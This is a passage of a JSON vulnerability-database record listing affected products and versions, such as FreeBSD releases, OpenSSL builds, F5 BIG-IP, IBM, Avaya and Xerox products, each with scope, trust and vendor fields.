"eq", "trust": 0.3, "vendor": "ibm", "version": "54550" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "7.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-stablepre122300", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.2x" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "7.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.0-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "8.4-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2408738" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "8.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0.x" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.3-rc", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "9.3-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "8.4-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "project openssl 0.9.8m beta1", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10.0-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.7" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "-pre-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager utility services sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.16.1.0.9.8" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7845" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079150" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "8.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "colorqube r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "8700072.161.134.32804" }, { "model": "enterprise linux load balancer eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "9.2-rc2-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5735" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.2-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35507914" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.1" }, { "model": "8.3-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "9.1-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "9.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.3" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.5" }, { "model": "7.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.2-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.3x" }, { "model": "9.3-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "8.3-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7855" }, { "model": "-stablepre2002-03-07", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "big-ip apm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087330" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.2" }, { "model": "8.3-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.6.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "upward integration modules scvmm add-in", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "7.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.3" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "8.3-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "workcentre r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7830072.010.134.32804" }, { "model": "9.2-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "7.3-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "workcentre r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7845072.040.134.32804" }, { "model": "6.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand workflow automation", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "oncommand unified manager core package 5.2.1p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.0" }, { "model": "8.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5845" }, { "model": "-release-p9", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "7.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.1" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "big-ip edge gateway hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "8.3-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2202585" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "10.0-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "9.1-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "colorqube r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "8900072.161.134.32804" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "9.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.21" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.3" }, { "model": "colorqube r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9302072.180.134.32804" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "open systems snapvault 3.0.1p6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.5" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.1" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "workcentre r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "3655072.060.134.32804" }, { "model": "-release-p1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5735061.132.224.35203" }, { "model": "8-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2227916" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "-release-p6", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "8.4-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "8.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "8.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "7.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "-stablepre050201", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "8.4-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7855072.040.134.32804" }, { "model": "-release-p9", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "workcentre r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "6655072.060.134.32804" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2-" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip wom hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "9.1-release-p18", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "10.0-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "7.3-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1i", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0n", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.4x" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0.x" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "7.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7220" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.3" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "10.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "hp-ux b.11.11 (11i", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v1)" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5755061.132.224.35203" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.7" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.3" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.4" }, { "model": "6.4-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x8804259" }, { "model": "10.0-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.1-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-493" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.21" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "workcentre r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7225072.030.134.32804" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "7.0-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1.5.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": 